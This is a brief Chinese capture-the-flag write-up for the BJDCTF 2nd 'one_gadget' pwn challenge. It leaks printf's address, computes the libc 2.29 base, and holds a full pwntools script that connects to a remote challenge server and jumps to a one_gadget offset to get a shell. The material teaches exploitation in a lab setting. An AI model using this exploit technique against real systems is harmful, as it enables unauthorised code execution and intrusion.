CTF-Pwn-[BJDCTF 2nd]one_gadget的wp

64位,放进ida看看
CTF-Pwn-[BJDCTF 2nd]one_gadget的wp
看一看这个main方法,要我们输入一个gadget,然后它回打印出来,再来看看init方法
CTF-Pwn-[BJDCTF 2nd]one_gadget的wp
用onegadget看看libc

one_gadget libc-2.29.so

发现
CTF-Pwn-[BJDCTF 2nd]one_gadget的wp
写脚本

from pwn import *

r=remote("node3.buuoj.cn",27772)
elf=ELF("./one_gadget")
libc=ELF('libc-2.29.so')

one_gadget1=[0xe237f,0xe2383,0xe2386,0x106ef8]
addr=int(r.recvline()[23:-1],16)

libc_base=addr-libc.sym['printf']
one_gadget=libc_base+one_gadget1[3]

r.recvuntil("Give me your one gadget:")
r.sendline(str(one_gadget))
r.interactive()
上一篇:Gadget开发实战总结 2 (I See Pink Problem)


下一篇:Android USB gadget configfs学习笔记总结